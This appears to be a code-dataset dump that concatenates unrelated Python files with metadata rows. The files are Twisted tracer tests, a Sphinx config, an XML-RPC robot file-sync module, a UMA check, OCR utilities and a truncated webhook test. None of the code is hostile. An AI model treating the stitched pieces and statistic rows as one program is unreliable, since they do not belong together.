_frame_eggs,
{'__name__': 'twisted.internet.defer'},
{'f': FakeFunction(FakeCode('sausage.py', 'sausage'))})
def test_trace_deferred_return_initial_setup():
"""
If a function returns a Deferred, nothing happens until the Deferred
fires. More specifically, no function trace information is stored.
"""
t = Tracer()
d = defer.Deferred()
t._trace(_frame_spam, 'return', d)
assert not t._function_data
def _trace_deferred_firing_after(clock, tracer, frame, seconds):
"""
Helper function to advance a clock and fire a Deferred.
"""
d = defer.Deferred()
tracer._trace(frame, 'call', None)
tracer._trace(frame, 'return', d)
clock.advance(seconds)
d.callback(None)
def test_trace_deferred_return():
"""
If a function returns a Deferred, after that Deferred fires, function trace
information is stored regarding the amount of time it took for that
Deferred to fire.
"""
clock = task.Clock()
t = Tracer(reactor=clock)
_trace_deferred_firing_after(clock, t, _frame_spam, 1.5)
assert t._function_data == {
('spam.py', 'spam'): ({}, 1500000),
}
def test_trace_deferred_return_with_caller():
"""
If the function returning the Deferred has a frame above it, that
information is stored as well.
"""
clock = task.Clock()
t = Tracer(reactor=clock)
_trace_deferred_firing_after(clock, t, _frame_eggs, 1.5)
assert t._function_data == {
('spam.py', 'spam'): ({
('eggs.py', 'eggs'): (1, 1500000),
}, 0),
('eggs.py', 'eggs'): ({}, 1500000),
}
def test_trace_deferred_return_with_multiple_calls():
"""
If the function(s) returning the Deferred(s) are called multiple times, the
timing data is summed.
"""
clock = task.Clock()
t = Tracer(reactor=clock)
_trace_deferred_firing_after(clock, t, _frame_spam, 0.5)
_trace_deferred_firing_after(clock, t, _frame_spam, 0.25)
_trace_deferred_firing_after(clock, t, _frame_eggs, 0.125)
assert t._function_data == {
('spam.py', 'spam'): ({
('eggs.py', 'eggs'): (1, 125000),
}, 750000),
('eggs.py', 'eggs'): ({}, 125000),
}
def test_trace_inlineCallbacks_detection():
"""
Tracer will detect the use of inlineCallbacks and rewrite the call stacks
to look better and contain more information.
"""
clock = task.Clock()
t = Tracer(reactor=clock)
_trace_deferred_firing_after(clock, t, _frame_unwindGenerator, 0.5)
assert t._function_data == {
('spam.py', 'spam'): ({
('eggs.py', 'eggs'): (1, 500000),
}, 0),
('eggs.py', 'eggs'): ({
('sausage.py', 'sausage'): (1, 500000),
}, 0),
('sausage.py', 'sausage'): ({}, 500000),
}
def test_tracer_calltree_output():
"""
Tracer's write_data method writes out calltree-formatted information.
"""
clock = task.Clock()
t = Tracer(reactor=clock)
_trace_deferred_firing_after(clock, t, _frame_spam, 0.5)
_trace_deferred_firing_after(clock, t, _frame_spam, 0.25)
_trace_deferred_firing_after(clock, t, _frame_eggs, 0.125)
sio = StringIO()
t.write_data(sio)
assert sio.getvalue() == textwrap.dedent("""\
events: Nanoseconds
fn=eggs eggs.py
0 125000
fn=spam spam.py
0 750000
cfn=eggs eggs.py
calls=1 0
0 125000
""")
class FakeSys(object):
tracer = None
def setprofile(self, trace):
self.tracer = trace
def getprofile(self):
return self.tracer
@pytest.fixture
def fakesys(monkeypatch):
fakesys = FakeSys()
monkeypatch.setattr('theseus._tracer.sys', fakesys)
return fakesys
def test_tracer_install(fakesys):
"""
Tracer's install method will install itself globally using sys.setprofile.
"""
t = Tracer()
t.install()
assert fakesys.tracer == t._trace
def test_tracer_wrapped_hook(fakesys):
"""
If a profile hook was set prior to calling Tracer's install method, it will
continue to be called by Tracer.
"""
calls = []
def tracer(frame, event, arg):
calls.append((frame, event, arg))
fakesys.tracer = tracer
t = Tracer()
t.install()
sentinel = object()
t._trace(sentinel, 'call', sentinel)
assert calls == [(sentinel, 'call', sentinel)]
def test_tracer_uninstall(fakesys):
"""
Tracer's install method will uninstall itself as well.
"""
t = Tracer()
t.install()
t.uninstall()
assert fakesys.tracer is None
def test_tracer_uninstall_with_other_hook(fakesys):
"""
If another profile hook was installed after the Tracer was installed, then
the profile hook will remain unchanged.
"""
t = Tracer()
t.install()
fakesys.tracer = sentinel = object()
t.uninstall()
assert fakesys.tracer is sentinel
def test_tracer_uninstall_with_other_hook_previously_installed(fakesys):
"""
If another profile hook was installed before the Tracer was installed, then
the profile hook will be restored to that profile hook.
"""
t = Tracer()
fakesys.tracer = sentinel = object()
t.install()
t.uninstall()
assert fakesys.tracer is sentinel
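# Hypothetical profiling session (sketch only; the output file name is an
# assumption):
#     t = Tracer()
#     t.install()
#     ...  # run the Twisted application being profiled
#     t.uninstall()
#     with open('callgrind.theseus', 'w') as outfile:
#         t.write_data(outfile)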
| 27.210332
| 79
| 0.649173
| 930
| 7,374
| 4.941935
| 0.189247
| 0.022846
| 0.04134
| 0.052219
| 0.452132
| 0.401436
| 0.353351
| 0.294822
| 0.263925
| 0.238251
| 0
| 0.019757
| 0.231218
| 7,374
| 270
| 80
| 27.311111
| 0.790968
| 0.227421
| 0
| 0.371069
| 0
| 0
| 0.096524
| 0.008136
| 0
| 0
| 0
| 0
| 0.09434
| 1
| 0.144654
| false
| 0
| 0.037736
| 0.006289
| 0.226415
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34a2c4ef21ebf75e62e5e53df18db5c3d07d0336
| 1,665
|
py
|
Python
|
testdoc/conf.py
|
coding-to-music/sphinx-seo-meta-twitter
|
23ec10e32ae272d5024d2468a87813ecabd30bfa
|
[
"BSD-3-Clause"
] | null | null | null |
testdoc/conf.py
|
coding-to-music/sphinx-seo-meta-twitter
|
23ec10e32ae272d5024d2468a87813ecabd30bfa
|
[
"BSD-3-Clause"
] | null | null | null |
testdoc/conf.py
|
coding-to-music/sphinx-seo-meta-twitter
|
23ec10e32ae272d5024d2468a87813ecabd30bfa
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import sys, os
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinxcontrib.seometatwitter']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'sphinx-seometatwitter'
copyright = u'2021'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.6.0'
# The full version, including alpha/beta/rc tags.
release = '0.6.0'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
html_theme = 'default'
html_static_path = ['_static']
# Output file base name for HTML help builder.
htmlhelp_basename = 'tweettestdoc'
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'tweettest', u'tweettest Documentation',
[u'test'], 1)
]
| 27.295082
| 80
| 0.713514
| 229
| 1,665
| 5.122271
| 0.606987
| 0.00682
| 0.005115
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010745
| 0.161562
| 1,665
| 60
| 81
| 27.75
| 0.829513
| 0.681682
| 0
| 0
| 0
| 0
| 0.319444
| 0.097222
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.055556
| 0
| 0.055556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34a414f71bdbac2f19072c327b891b149dfefa34
| 6,511
|
py
|
Python
|
dash/lib/events/servermanagement.py
|
wjwwood/open-robotics-platform
|
c417f1e4e381cdbbe88ba9ad4dea3bdf9840d3d5
|
[
"MIT"
] | null | null | null |
dash/lib/events/servermanagement.py
|
wjwwood/open-robotics-platform
|
c417f1e4e381cdbbe88ba9ad4dea3bdf9840d3d5
|
[
"MIT"
] | null | null | null |
dash/lib/events/servermanagement.py
|
wjwwood/open-robotics-platform
|
c417f1e4e381cdbbe88ba9ad4dea3bdf9840d3d5
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python -OO
# encoding: utf-8
###########
# ORP - Open Robotics Platform
#
# Copyright (c) 2010 John Harrison, William Woodall
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
##########
"""
servermanagement.py - Contains components related to remote server management
Created by William Woodall on 2010-11-03.
"""
__author__ = "William Woodall"
__copyright__ = "Copyright (c) 2010 John Harrison, William Woodall"
### Imports ###
# Standard Python Libraries
import sys
import os
import logging
import thread
import xmlrpclib
import copy
import traceback
# Other libraries
import lib.elements as elements
try: # try to catch any missing dependencies
# wx for window elements
PKGNAME = 'wxpython'
import wx
import wx.aui as aui
del PKGNAME
except ImportError as PKG_ERROR: # We are missing something, let them know...
sys.stderr.write(str(PKG_ERROR)+"\nYou might not have the "+PKGNAME+" \
module, try 'easy_install "+PKGNAME+"', else consult google.")
### Functions ###
def sync_files(files):
cc_files, hwm_files = files
sync_files_helper(cc_files, "files", elements.MAIN.files[0])
sync_files_helper(hwm_files, "modules", elements.MAIN.files[1])
# buildListing()
elements.MAIN.project_drawer.updateList()
def sync_files_helper(files, root_folder, base_array):
local_array = copy.deepcopy(base_array)
for file in files:
try:
path_array = file.split(os.sep)
parent_array = file_array = local_array
file_index_reference = None
try:
if len(path_array):
for x in path_array:
parent_array = file_array
file_array = file_array[x]
file_index_reference = x
except KeyError as filename_error:
pass # this is supposed to happen, we handle it below
if file_array[1] == files[file]:
# Same file,
pass
elif file_array[1] > files[file]:
# Local copy is newer
contents = open(file_array[0], 'r').read()
elements.REMOTE_SERVER.write(os.path.join(root_folder, file), contents, file_array[1])
elif file_array[1] < files[file]:
# Server Copy is newer
# this is handling the key error above
file_path = os.path.join(os.getcwd(), root_folder, file)
with open(file_path, 'w+') as fp:
fp.write(elements.REMOTE_SERVER.getFileContents(os.path.join(root_folder, file)))
os.utime(file_path, (files[file], files[file]))
del parent_array[file_index_reference]
except KeyError:
try:
if file.find(os.sep) != -1:
os.makedirs(os.path.join(os.getcwd(), root_folder, os.path.split(file)[0]))
file_path = os.path.join(os.getcwd(), root_folder, file)
with open(file_path, 'w+') as fp:
fp.write(elements.REMOTE_SERVER.getFileContents(os.path.join(root_folder, file)))
os.utime(file_path, (files[file], files[file]))
except Exception as e:
traceback.print_exc(file=sys.stdout)
walk_and_send_files(root_folder, local_array)
def walk_and_send_files(root, list):
"""Walks a hash and sends the files to the remote server."""
if isinstance(list, dict):
for file in list:
if file[0] == '.':
continue
new_root = os.path.join(root, file)
walk_and_send_files(new_root, list[file])
else:
file_handler = open(list[0], 'r')
elements.REMOTE_SERVER.write(root, file_handler.read(), list[1])
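# The sync helpers above assume a nested hash of the form (illustrative):
#     {'subdir': {'script.py': ['/abs/path/script.py', 1288000000]}}
# i.e. directories are dicts keyed by path component and each leaf is a
# [local_path, modification_time] pair.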
def connect(event):
"""Connects to the remote server, using the info in remote server text box"""
# Connect to the remote server
location = elements.TOOLBAR.server_addr.GetValue()
try:
elements.REMOTE_SERVER = xmlrpclib.Server('http://' + str(location) + ':7003/')
elements.REMOTE_SERVER.connect()
elements.TOOLBAR.connect_button.SetLabel('Disconnect')
elements.TOOLBAR.connect_button.Bind(wx.EVT_BUTTON, disconnect)
elements.MAIN.SetStatusText('Connected')
except Exception as error:
elements.MAIN.log.error(str(error))
return
# Activate Buttons
elements.TOOLBAR.send_button.Enable()
elements.TOOLBAR.config_button.Enable()
elements.TOOLBAR.run_button.Enable()
elements.TOOLBAR.shutdown_button.Enable()
elements.TOOLBAR.restart_button.Enable()
elements.TOOLBAR.RC_button.Enable()
# Synchronize Files
sync_files(elements.REMOTE_SERVER.fileSync())
def disconnect(event):
"""Attempts to disconnect from the remote server"""
elements.TOOLBAR.connect_button.SetLabel('Connect')
elements.TOOLBAR.send_button.Disable()
elements.TOOLBAR.run_button.Disable()
elements.TOOLBAR.shutdown_button.Disable()
elements.TOOLBAR.restart_button.Disable()
elements.TOOLBAR.connect_button.Bind(wx.EVT_BUTTON, connect)
elements.REMOTE_SERVER.disconnect()
elements.REMOTE_SERVER.remote_server = None
elements.MAIN.SetStatusText('Disconnected')
def restart(event):
"""Calls the remote server to restart"""
elements.REMOTE_SERVER.restart()
def shutdown(event):
"""Shuts down the remote server"""
elements.REMOTE_SERVER.shutdown()
disconnect(None)
| 38.526627
| 102
| 0.665643
| 836
| 6,511
| 5.055024
| 0.328947
| 0.056791
| 0.052059
| 0.031945
| 0.176763
| 0.138192
| 0.121628
| 0.096072
| 0.075722
| 0.075722
| 0
| 0.006639
| 0.236523
| 6,511
| 169
| 103
| 38.526627
| 0.843492
| 0.289971
| 0
| 0.145631
| 0
| 0
| 0.042238
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067961
| false
| 0.019417
| 0.106796
| 0
| 0.184466
| 0.009709
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34a4b62edf263b2fe76869067f5c2acf0eed223a
| 1,661
|
py
|
Python
|
test/uma/rp/check.py
|
rohe/oictest
|
f6f0800220befd5983b8cb34a5c984f98855d089
|
[
"Apache-2.0"
] | 32
|
2015-01-02T20:15:17.000Z
|
2020-02-15T20:46:25.000Z
|
test/uma/rp/check.py
|
rohe/oictest
|
f6f0800220befd5983b8cb34a5c984f98855d089
|
[
"Apache-2.0"
] | 8
|
2015-02-23T19:48:53.000Z
|
2016-01-20T08:24:05.000Z
|
test/uma/rp/check.py
|
rohe/oictest
|
f6f0800220befd5983b8cb34a5c984f98855d089
|
[
"Apache-2.0"
] | 17
|
2015-01-02T20:15:22.000Z
|
2022-03-22T22:58:28.000Z
|
import inspect
import sys
from uma import message
from rrtest.check import Error, get_protocol_response
from rrtest import Unknown
from oictest import check
__author__ = 'roland'
CLASS_CACHE = {}
class MatchResourceSet(Error):
"""
Verify that the returned resource set is as expected
"""
cid = "match-resource-set"
msg = ""
def _func(self, conv):
res = get_protocol_response(conv, message.ResourceSetDescription)
inst, txt = res[-1]
rset = self._kwargs["rset"]
# All but _id and _rev should be equal
for key in message.ResourceSetDescription.c_param.keys():
if key in ["_id", "_rev"]:
continue
try:
assert rset[key] == inst[key]
except AssertionError:
self._message = "Not the resource set I expected"
self._status = self.status
break
except KeyError:
try:
assert key not in rset and key not in inst
except AssertionError:
self._message = "Not the resource set I expected"
self._status = self.status
break
return {}
def factory(cid, classes=CLASS_CACHE):
if len(classes) == 0:
for name, obj in inspect.getmembers(sys.modules[__name__]):
if inspect.isclass(obj):
try:
classes[obj.cid] = obj
except AttributeError:
pass
if cid in classes:
return classes[cid]
else:
classes = {}
return check.factory(cid, classes)
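# Illustrative lookup (not part of the original module):
#     factory("match-resource-set")  # -> the MatchResourceSet class
# Unknown cids fall through to oictest's check.factory with a fresh cache.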
| 27.683333
| 73
| 0.556291
| 181
| 1,661
| 4.966851
| 0.441989
| 0.048943
| 0.042269
| 0.068966
| 0.182425
| 0.182425
| 0.182425
| 0.182425
| 0.182425
| 0.182425
| 0
| 0.001905
| 0.367851
| 1,661
| 59
| 74
| 28.152542
| 0.854286
| 0.054184
| 0
| 0.244444
| 0
| 0
| 0.062379
| 0
| 0
| 0
| 0
| 0
| 0.088889
| 1
| 0.044444
| false
| 0.022222
| 0.133333
| 0
| 0.311111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34a59aa4fd323b18e2045c4173ab3b0589d86fd9
| 10,959
|
py
|
Python
|
lib/utils/general.py
|
yingbiaoluo/ocr_pytorch
|
7d9163f7d6d557d83e2f50a39a3219f330f0cf84
|
[
"MIT"
] | null | null | null |
lib/utils/general.py
|
yingbiaoluo/ocr_pytorch
|
7d9163f7d6d557d83e2f50a39a3219f330f0cf84
|
[
"MIT"
] | null | null | null |
lib/utils/general.py
|
yingbiaoluo/ocr_pytorch
|
7d9163f7d6d557d83e2f50a39a3219f330f0cf84
|
[
"MIT"
] | null | null | null |
import os
import cv2
import glob
import logging
import numpy as np
from pathlib import Path
import torch
from torch.autograd import Variable
import torch.distributed as dist
class strLabelConverter(object):
def __init__(self, alphabet_):
"""
String-label converter: maps characters to integer indices and back.
"""
self.alphabet = alphabet_ + 'Ω'
self.dict = {}
for i, char in enumerate(self.alphabet):
self.dict[char] = i + 1
def encode(self, text):
length = []
result = []
for item in text:
item = item.replace(' ', '').replace('\t', '')
length.append(len(item))
for char in item:
if char not in self.alphabet:
print('char {} not in alphabet!'.format(char))
char = '-'
index = self.dict[char]
result.append(index)
text = result
return torch.IntTensor(text), torch.IntTensor(length)
def decode(self, t, length, raw=False):
"""Decode encoded texts back into strs.
Args:
torch.IntTensor [length_0 + length_1 + ... length_{n - 1}]: encoded texts.
torch.IntTensor [n]: length of each text.
Raises:
AssertionError: when the texts and its length does not match.
Returns:
text (str or list of str): texts to convert.
"""
if length.numel() == 1:  # the number of elements is exactly one
length = length[0]
assert t.numel() == length, "text with length: {} does not match declared length: {}".format(t.numel(), length)
if raw:
return ''.join([self.alphabet[i - 1] for i in t])
else:
char_list = []
for i in range(length):
if t[i] != 0 and (not (i > 0 and t[i - 1] == t[i])):
char_list.append(self.alphabet[t[i] - 1])
return ''.join(char_list)
else:
# batch mode
assert t.numel() == length.sum(), "texts with length: {} does not match declared length: {}".format(t.numel(), length.sum())
texts = []
index = 0
for i in range(length.numel()):
l = length[i]
texts.append(
self.decode(
t[index:index + l], torch.IntTensor([l]), raw=raw))
index += l
return texts
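# Illustrative CTC round trip (the alphabet is an assumption, sketch only):
# with an alphabet starting "ab...", decode(torch.IntTensor([1, 1, 0, 2, 0, 2]),
# torch.IntTensor([6])) collapses the repeated 1 and drops the 0 blanks,
# yielding "abb".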
class averager(object):
"""Compute average for `torch.Variable` and `torch.Tensor`. """
def __init__(self):
self.reset()
def add(self, v):
if isinstance(v, Variable):
count = v.data.numel()
v = v.data.sum()
elif isinstance(v, torch.Tensor):
count = v.numel()
v = v.sum()
self.n_count += count
self.sum += v
def reset(self):
self.n_count = 0
self.sum = 0
def val(self):
res = 0
if self.n_count != 0:
res = self.sum / float(self.n_count)
return res
def generate_alphabets(alphabet_path):
"""
Read the text labels and build the alphabet (character table).
:param alphabet_path: path to the text label file.
:return: the alphabet string.
"""
with open(alphabet_path, 'r', encoding='utf-8') as file:
alphabet = sorted(list(set(repr(''.join(file.readlines())))))
if ' ' in alphabet:
alphabet.remove(' ')
alphabet = ''.join(alphabet)
return alphabet
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self, name, fmt=':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
return fmtstr.format(**self.__dict__)
class ProgressMeter(object):
def __init__(self, num_batches, meters, prefix=""):
self.batch_fmtstr = self._get_batch_fmtstr(num_batches)
self.meters = meters
self.prefix = prefix
def display(self, batch):
entries = [self.prefix + self.batch_fmtstr.format(batch)]
entries += [str(meter) for meter in self.meters]
print('\t'.join(entries))
def _get_batch_fmtstr(self, num_batches):
num_digits = len(str(num_batches // 1))
fmt = '{:' + str(num_digits) + 'd}'
return '[' + fmt + '/' + fmt.format(num_batches) + ']'
def lev_ratio(str_a, str_b):
"""
Edit (Levenshtein) distance ratio, used to measure the similarity between two words.
:param str_a:
:param str_b:
:return:
"""
str_a = str_a.lower()
str_b = str_b.lower()
matrix_ed = np.zeros((len(str_a) + 1, len(str_b) + 1), dtype=int)  # np.int was removed in NumPy 1.24
matrix_ed[0] = np.arange(len(str_b) + 1)
matrix_ed[:, 0] = np.arange(len(str_a) + 1)
for i in range(1, len(str_a) + 1):
for j in range(1, len(str_b) + 1):
# deletion of a_i
dist_1 = matrix_ed[i - 1, j] + 1
# insertion of b_i
dist_2 = matrix_ed[i, j - 1] + 1
# substitution of b_i
dist_3 = matrix_ed[i - 1, j - 1] + (2 if str_a[i - 1] != str_b[j - 1] else 0)
# take the minimum distance
matrix_ed[i, j] = np.min([dist_1, dist_2, dist_3])
# print(matrix_ed)
levenshtein_distance = matrix_ed[-1, -1]
sum = len(str_a) + len(str_b)
levenshtein_ratio = (sum - levenshtein_distance) / sum
return levenshtein_ratio
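# Worked example (illustrative): with substitution costed at 2 the distance
# reduces to len(a) + len(b) - 2 * LCS(a, b), so
#     lev_ratio("kitten", "sitting")  # -> (13 - 5) / 13 ≈ 0.615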
def set_logging():
logging.basicConfig(
format="%(asctime)s %(message)s", # 指定输出的格式和内容, %(message)s: 打印日志信息
level=logging.INFO) # 设置日志级别 默认为logging.WARNING
def get_latest_run(search_dir='./runs'):
# Return path to most recent 'last.pt' in /runs (i.e. to --resume from)
last_list = glob.glob(f'{search_dir}/**/last*.pt', recursive=True)
return max(last_list, key=os.path.getctime) if last_list else ''
def check_file(file):
# Search for file if not found
if os.path.isfile(file) or file == '':
return file
else:
files = glob.glob('./**/' + file, recursive=True)  # find file; '**' matches files, directories and subdirectories recursively
assert len(files), 'File Not Found: %s' % file # assert file was found
return files[0] # return first file if multiple found
def increment_dir(dir, comment=''):
# Increments a directory runs/exp1 --> runs/exp2_comment
n = 0 # number
dir = str(Path(dir)) # os-agnostic
d = sorted(glob.glob(dir + '*')) # directories
if len(d):
n = max([int(x[len(dir):x.find('_') if '_' in x else None]) for x in d]) + 1 # increment
return dir + str(n) + ('_' + comment if comment else '')
def xyxy2xywh(x):
# Convert nx4 boxes from [x1, y1, x2, y2] to [x, y, w, h] where xy1=top-left, xy2=bottom-right
y = torch.zeros_like(x) if isinstance(x, torch.Tensor) else np.zeros_like(x)
y[:, 0] = (x[:, 0] + x[:, 2]) / 2 # x center
y[:, 1] = (x[:, 1] + x[:, 3]) / 2 # y center
y[:, 2] = x[:, 2] - x[:, 0] # width
y[:, 3] = x[:, 3] - x[:, 1] # height
return y
def xywh2xyxy(x):
# Convert nx4 boxes from [x, y, w, h] to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right
y = torch.zeros_like(x) if isinstance(x, torch.Tensor) else np.zeros_like(x)
y[:, 0] = x[:, 0] - x[:, 2] / 2 # top left x
y[:, 1] = x[:, 1] - x[:, 3] / 2 # top left y
y[:, 2] = x[:, 0] + x[:, 2] / 2 # bottom right x
y[:, 3] = x[:, 1] + x[:, 3] / 2 # bottom right y
return y
def denoise(image):
"""
Denoise a grayscale image (note: cv2.fastNlMeansDenoising takes a long time to run, so this denoising function is best avoided).
"""
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
dst = cv2.fastNlMeansDenoising(image, None, h=10, templateWindowSize=7, searchWindowSize=21)
ret, image = cv2.threshold(dst, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
return image
def resize_padding(image, height, width):
# resize
h, w, c = image.shape
image = cv2.resize(image, (0, 0), fx=height / h, fy=height / h, interpolation=cv2.INTER_LINEAR)
# padding
h, w, c = image.shape
img = 255. * np.ones((height, width, c))
if w < width:
img[:, :w, :] = image
else:
r = height / h
img = cv2.resize(image, (0, 0), fx=r, fy=r, interpolation=cv2.INTER_LINEAR)
return img
def padding_image_batch(image_batch, height=32, width=480):
aspect_ratios = []
for image in image_batch:
h, w, c = image.shape
aspect_ratios.append(w/h)
max_len = int(np.ceil(32 * max(aspect_ratios)))
pad_len = max_len if max_len > width else width
imgs = []
for image in image_batch:
img = resize_padding(image, height, pad_len)
img = np.transpose(img, (2, 0, 1))
imgs.append(img)
img_batch = torch.from_numpy(np.array(imgs)) / 255.
return img_batch.float()
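# Shape sketch (illustrative): given a list of HxWx3 images, each is resized to
# height 32, right-padded with white to a common width of at least `width`,
# transposed to CxHxW, and the batch is returned as a float tensor in [0, 1]
# of shape (N, 3, 32, pad_len).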
logger_initialized = {}
def get_logger(name, log_file=None, log_level=logging.INFO):
"""Initialize and get a logger by name.
If the logger has not been initialized, this method will initialize the
logger by adding one or two handlers, otherwise the initialized logger will
be directly returned. During initialization, a StreamHandler will always be
added. If `log_file` is specified and the process rank is 0, a FileHandler
will also be added.
Args:
name (str): Logger name.
log_file (str | None): The log filename. If specified, a FileHandler
will be added to the logger.
log_level (int): The logger level. Note that only the process of
rank 0 is affected, and other processes will set the level to
"Error" thus be silent most of the time.
Returns:
logging.Logger: The expected logger.
"""
logger = logging.getLogger(name)
if name in logger_initialized:
return logger
# handle hierarchical names
# e.g., logger "a" is initialized, then logger "a.b" will skip the
# initialization since it is a child of "a".
for logger_name in logger_initialized:
if name.startswith(logger_name):
return logger
stream_handler = logging.StreamHandler()
handlers = [stream_handler]
if dist.is_available() and dist.is_initialized(): # True False
rank = dist.get_rank()
else:
rank = 0
# only rank 0 will add a FileHandler
if rank == 0 and log_file is not None:
file_handler = logging.FileHandler(log_file, 'w')
handlers.append(file_handler)
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s')
for handler in handlers:
handler.setFormatter(formatter)
handler.setLevel(log_level)
logger.addHandler(handler)
if rank == 0:
logger.setLevel(log_level)
else:
logger.setLevel(logging.ERROR)
logger_initialized[name] = True
return logger
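# Illustrative call (the file name is an assumption):
#     logger = get_logger("ocr", log_file="train.log", log_level=logging.INFO)
#     logger.info("starting epoch 0")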
| 31.582133
| 136
| 0.57195
| 1,502
| 10,959
| 4.066578
| 0.225033
| 0.008841
| 0.007204
| 0.008841
| 0.106745
| 0.067453
| 0.057629
| 0.047806
| 0.047806
| 0.047806
| 0
| 0.019458
| 0.29656
| 10,959
| 346
| 137
| 31.67341
| 0.772863
| 0.203029
| 0
| 0.109091
| 0
| 0
| 0.036989
| 0.002836
| 0
| 0
| 0
| 0
| 0.013636
| 1
| 0.118182
| false
| 0
| 0.040909
| 0
| 0.272727
| 0.009091
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34a704c37474e7d90bc81f141c9416313e5a36b0
| 3,912
|
py
|
Python
|
tests/unit_tests/webhook_server_test.py
|
Leanny/mmpy_bot
|
fd16db4f1b07130fbf95568fb242387f0c7973e2
|
[
"MIT"
] | 196
|
2018-05-31T23:45:34.000Z
|
2022-03-20T09:06:55.000Z
|
tests/unit_tests/webhook_server_test.py
|
Leanny/mmpy_bot
|
fd16db4f1b07130fbf95568fb242387f0c7973e2
|
[
"MIT"
] | 216
|
2018-05-31T19:18:46.000Z
|
2022-03-21T17:09:38.000Z
|
tests/unit_tests/webhook_server_test.py
|
tgly307/mmpy_bot
|
0ae52d9db86ac018f3d48dd52c11e4996f549073
|
[
"MIT"
] | 107
|
2018-06-01T05:12:27.000Z
|
2022-02-25T12:40:10.000Z
|
import asyncio
import threading
import time
import pytest
from aiohttp import ClientSession
from mmpy_bot import Settings
from mmpy_bot.threadpool import ThreadPool
from mmpy_bot.webhook_server import NoResponse, WebHookServer
@pytest.fixture(scope="function")
def threadpool():
pool = ThreadPool(num_workers=1)
yield pool
pool.stop() # if the pool was started, stop it.
class TestWebHookServer:
def test_start(self, threadpool):
# Test server startup with a different port so it won't clash with the
# integration tests
server = WebHookServer(port=3281, url=Settings().WEBHOOK_HOST_URL)
threadpool.start_webhook_server_thread(server)
threadpool.start()
time.sleep(0.5)
assert server.running
asyncio.set_event_loop(asyncio.new_event_loop())
# Run the other tests sequentially
self.test_obtain_response(server)
self.test_process_webhook(server)
# Test shutdown procedure
threadpool.stop()
assert not server.running
@pytest.mark.skip("Called from test_start since we can't parallellize this.")
def test_obtain_response(self, server):
assert server.response_handlers == {}
# Wait for a response for request id 'test'.
await_response = asyncio.get_event_loop().create_future()
server.response_handlers["test"] = await_response
